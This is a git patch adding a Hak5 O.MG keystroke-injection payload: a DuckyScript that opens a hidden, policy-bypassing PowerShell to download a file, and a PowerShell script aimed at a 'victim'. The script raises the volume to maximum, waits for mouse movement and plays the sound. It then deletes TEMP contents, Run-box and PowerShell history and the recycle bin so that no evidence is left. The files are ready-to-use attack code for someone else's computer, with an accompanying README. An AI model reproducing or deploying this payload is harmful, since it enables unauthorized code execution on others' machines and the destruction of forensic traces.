From bba4f6aa1cbc48a45c14f5ae3dab82b65a8d44fd Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 9 May 2022 22:42:50 -0500 Subject: [PATCH] Add files via upload --- .../execution/-OMG-Play-WAV/Play-WAV-Execute | 16 +++ .../execution/-OMG-Play-WAV/Play-WAV.ps1 | 89 +++++++++++++++++ .../library/execution/-OMG-Play-WAV/README.md | 99 +++++++++++++++++++ 3 files changed, 204 insertions(+) create mode 100644 payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute create mode 100644 payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1 create mode 100644 payloads/library/execution/-OMG-Play-WAV/README.md diff --git a/payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute b/payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute new file mode 100644 index 0000000..f0f6b01 --- /dev/null +++ b/payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute @@ -0,0 +1,16 @@ +REM Title: Play-WAV + +REM Author: I am Jakoby + +REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details + +REM Target: Windows 10, 11 + +REM Remeber to replace the link with your link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav +DELAY 500 +ENTER diff --git a/payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1 b/payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1 new file mode 100644 index 0000000..687e4a3 --- /dev/null +++ b/payloads/library/execution/-OMG-Play-WAV/Play-WAV.ps1 @@ -0,0 +1,89 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script requires you to have a DropBox account or another file hosting service + +.DESCRIPTION + This program downloads a sound from your DropBox + Turns the volume to max level on victims PC + Pauses the script until a mouse movement is detected + Then plays the sound with nothing popping up catching your victim off guard + Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history + +#> + +############################################################################################################################################################ + +# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1") +iwr https:// ?dl=1 -O $env:TMP\e.wav + +############################################################################################################################################################ + +# This turns the volume up to max level +$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)} + +############################################################################################################################################################ + +# This while loop will constantly check if the mouse has been moved +# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off +# it will then sleep for the indicated number of seconds and check again + +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +############################################################################################################################################################ + +# Play Sound +$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync() + +############################################################################################################################################################ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + diff --git a/payloads/library/execution/-OMG-Play-WAV/README.md b/payloads/library/execution/-OMG-Play-WAV/README.md new file mode 100644 index 0000000..66ebbab --- /dev/null +++ b/payloads/library/execution/-OMG-Play-WAV/README.md @@ -0,0 +1,99 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Play-WAV + +A script used to download a WAV file and play it after a mouse movement is detected + +## Description + +This program starts off by using an Invoke-WebRequest to download a WAV file +The system volume is then turned up to the max level +Then the script will be paused until a mouse movement is detected +After one is the WAV file will be played + +## Getting Started + +### Dependencies + +* DropBox - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download your WAV file +``` +powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Play-WAV) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + +

(back to top)